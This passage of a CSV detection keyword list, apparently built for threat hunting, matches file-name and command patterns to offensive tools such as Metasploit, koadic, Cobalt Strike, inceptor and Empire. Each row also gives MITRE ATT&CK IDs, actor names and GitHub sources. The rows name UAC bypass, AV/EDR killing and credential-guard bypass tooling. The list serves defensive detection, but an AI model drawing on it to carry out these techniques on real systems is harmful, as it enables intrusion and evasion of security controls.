T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*byakugan/bin/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Bye_Explorer.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*BYOVD_kill_av_edr.*","offensive_tool_keyword","BYOVD_kill_av_edr","BYOD to kill AV/EDR","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c","1","1","N/A","10","3","229","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" +"*bypass_cmdinject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypass_powershell_protections*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Bypass-4MSI*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*bypass-amsi*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*BypassAV.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike plugin for quickly generating anti-kill executable files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/hack2fun/BypassAV","1","1","N/A","10","10","830","126","2020-07-19T15:46:54Z","2020-02-17T02:33:14Z" +"*bypass-classic.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*BypassCredGuard.*","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1558 - T1558.001 - T1055 - T1055.002","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","277","50","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" +"*BypassCredGuard-master*","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1558 - T1558.001 - T1055 - T1055.002","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","277","50","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" +"*BYPASS-DINVOKE*.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*BYPASS-DINVOKE.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*BYPASS-DINVOKE_MANUAL_MAPPING.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*bypass-pipe.c*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bypass-powershell.ps1*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*BypassUAC *.exe*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*bypassuac fodhelper*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*Bypass-UAC*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*bypassUAC*.boo*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*bypassUAC*.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*--bypass-uac*--logontype*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*bypassuac_comhijack.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_compdefaults*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*bypassuac_compmgmtlauncher*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*bypassuac_eventvwr*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*bypassuac_fodhelper*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*bypassuac_injection*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_injection.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_injection.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_injection_winsxs.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_registry.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*bypassuac_sdclt*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*bypassuac_silentcleanup.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_slui*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*bypassuac_sluihijack.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_systempropertiesadvanced*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*bypassuac_token_imp.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*bypassuac_vbs.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_windows_store_reg.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_wsreset*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*BypassUACTokenManipulation*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1122","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - 